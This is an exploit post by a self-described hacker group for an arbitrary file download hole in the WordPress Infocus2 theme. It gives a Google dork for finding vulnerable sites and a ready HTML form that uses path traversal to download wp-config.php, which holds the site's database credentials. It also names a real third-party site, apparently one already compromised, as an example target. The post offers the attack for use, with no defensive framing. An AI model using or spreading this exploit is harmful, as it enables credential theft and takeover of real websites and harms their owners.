Wordpress Infocus2 Theme Arbitrary File Download Vulnerability

#Title : Wordpress Infocus2 Theme Arbitrary File Download Vulnerability
#Author : Killer~X  

#Date : 5/1/2015
################ [ Killer~X ] ################
Facebook : http://www.facebook.com/xXalreshyXx

Ask : http://ask.fm/ALRESHY

Twitter : https://twitter.com/killerx00x

Email : [email protected] or [email protected]

################ [ Killer~X ] ################


################ [ Yemeni Electronic Army ] ################

Yemeni Electronic Army : http://yeahacker.blogspot.in/

Official Members : Monds | King alnhzh | San3a T3rr0rist | GeeSuth | Al maistro | Muteb spack gen | Killer~X | Shraoop /.


################ [ Yemeni Electronic Army ] ################

__________________________________________________________________________________

#Vendor : www.wordpress.org

#google Dork : 
1-  inurl:/wp-content/themes/infocus2 


#Tested on : windows


################################################

#Exploit : 

<html>

<body>

<form action="wp-content/themes/infocus2/lib/scripts/dl-skin.php" method="POST">

<b>File</b>:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>

<input type="submit" value=Download>

</form>

</body>





#example : http://www.table26palmbeach.com/wp-content/plugins/wptouch/p8.php




__________________________________________________________________________________

#Greeting to :  All my friends 

<3 I love u mom <3 

||~ Done ~||

#  0day.today [2018-01-10]  #